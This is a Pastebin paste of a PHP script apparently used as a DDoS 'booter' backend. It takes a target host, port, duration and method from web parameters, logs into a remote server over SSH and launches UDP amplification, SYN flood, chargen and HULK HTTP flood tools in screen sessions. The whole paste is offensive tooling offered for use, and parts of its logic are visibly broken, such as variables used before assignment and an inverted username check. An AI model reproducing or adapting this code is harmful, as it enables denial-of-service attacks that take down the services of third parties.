Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- STOP ATTACK BY WOLF / YOKO
- <?php
- //Stop Attack Script re-coded by YoKo [WOLF]
- //Administator of Rebel Security, but closed now.
- //Have fun and please like.
- //PLEASE DONT GET A LEECHER fkg skid.
- ignore_user_abort(true);
- set_time_limit(0);
- function SendAttack($ip, $root, $password, $cmd1, $cmd2, $stop, $stopAtk) {
- if(!($con = ssh2_connect($ip, 22))){
- echo "Connection Error, restart server ?";
- } else {
- if(!ssh2_auth_password($con, $root, $password)) {
- echo "Error: Bad Login, verify info."; //Start to send command.
- }
- else
- {
- if($stop)//detect if stop is declared.
- {
- if (!($stream = ssh2_exec($con, $stopAtk ))) { echo "unknow cmd stop userid."; }
- else { stream_set_blocking($stream, false);
- $data = "";
- while ($buf = fread($stream,4096)) {
- $data .= $buf;
- } echo "Attack Stopped.";
- }
- }
- }
- else
- {
- if (!($stream = ssh2_exec($con, $cmd1 ))) {
- echo "Error: Unable to Execute Command\n";
- } else {
- if (!($stream = ssh2_exec($con, $cmd2 ))) {
- echo "please check 'yum install screen' or 'yudo apt-get screen'";
- }
- else { stream_set_blocking($stream, false);
- $data = "";
- while ($buf = fread($stream,4096)) {
- $data .= $buf;
- echo "Attack send.";
- }
- }
- }
- }
- }
- }//close function
- //attack method, et il ne sert a rien d'en mettre plus de 4, saturation inutile du server.
- $udp = "./amp ".$host." list.txt 1 -1 ".$time; //amplifier une attack udp spoof
- $xsyn = "./xsyn ".$host." ".$port." 1 ".$time;//alternative TCP Flood.
- $layer7 = "timeout ".$time." python hulk.py http://".$host." safe";//HTTP Atk
- $chargen = "./chargen ".$host." ".$port." xudp.txt 1 -1 ".$time;//tres bon script pour l'xudp.
- //End of attack method
- $ip = "IP Server";
- $root = "Root Username";
- $password = "Password";
- global $stop;
- $host = $_GET['host'];
- $port = $_GET['port'];
- $time = $_GET['time'];
- $method = htmlspecialchars(htmlentities(strtoupper($_GET['method'])));
- $username = $_GET['username'];//lanceur de l'attaque.
- $attackId = $username.$_GET['userAtk'] + 1;//nombre d'attaque deja lancer par l'user.
- $cmd3 = "screen -dmS ".$attackId; //pseudo + nombre d'atk en cour.
- $stopAtk = "screen -XS ".$attackId." quit";
- //---Setup Atk----
- if ($method == "UDP") {
- $cmd1 = $udp;
- $cmd2 = $cmd3;
- }
- if ($method == "XSYN") {
- $cmd1 = $udp;
- $cmd2 = $cmd3;
- }
- if ($method == "CHARGEN") {
- $cmd1 = $udp;
- $cmd2 = $cmd3;
- }
- if ($method == "LAYER7") {
- $cmd1 = $layer7;
- $cmd2 = $cmd3;
- }
- if(!empty($username))
- {
- die('Please type username for send attack, or server saturation.');
- } else {
- SendAttack($ip, $root, $password, $cmd1, $cmd2, $stopAtk);
- //Start Attack Stuff.
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement